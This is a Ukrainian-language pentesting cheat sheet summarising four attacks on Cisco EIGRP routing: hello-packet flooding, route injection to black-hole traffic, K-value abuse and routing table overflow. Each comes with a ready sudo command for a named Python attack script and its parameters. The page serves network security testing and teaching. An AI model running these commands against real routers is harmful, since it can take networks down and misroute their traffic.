EIGRP Attacks
Це підсумок атак, викритих в https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Перевірте його для отримання додаткової інформації.
Атака на створення фальшивих сусідів EIGRP
Мета: Перевантаження процесорів маршрутизаторів шляхом затоплення їх пакетами привітань EIGRP, що може призвести до атаки з відмовою в обслуговуванні (DoS).
Інструмент: Сценарій helloflooding.py.
Виконання: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
Параметри:
--interface
: Вказує мережевий інтерфейс, наприклад,eth0
.--as
: Визначає номер автономної системи EIGRP, наприклад,1
.--subnet
: Встановлює місце підмережі, наприклад,10.10.100.0/24
.
Атака чорної діри EIGRP
Мета: Перешкоджати потоку мережевого трафіку шляхом впровадження хибного маршруту, що призводить до чорної діри, куди трафік направляється до неіснуючого пункту призначення.
Інструмент: Сценарій routeinject.py.
Виконання: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
Параметри:
--interface
: Вказує інтерфейс системи атакуючого.--as
: Визначає номер AS EIGRP.--src
: Встановлює IP-адресу атакуючого.--dst
: Встановлює IP цільової підмережі.--prefix
: Визначає маску IP цільової підмережі.
Атака на зловживання значеннями K-Values
Мета: Створення постійних розривів та повторних підключень в домені EIGRP шляхом впровадження змінених значень K-Values, що фактично призводить до атаки з відмовою в обслуговуванні.
Інструмент: Сценарій relationshipnightmare.py.
Виконання: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
Параметри:
--interface
: Вказує мережевий інтерфейс.--as
: Визначає номер AS EIGRP.--src
: Встановлює IP-адресу легітимного маршрутизатора.
Атака переповнення таблиці маршрутизації
Мета: Напруження процесора та оперативної пам'яті маршрутизатора шляхом затоплення таблиці маршрутизації численними хибними маршрутами.
Інструмент: Сценарій routingtableoverflow.py.
Виконання: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
Параметри:
--interface
: Вказує мережевий інтерфейс.--as
: Визначає номер AS EIGRP.--src
: Встановлює IP-адресу атакуючого.
Last updated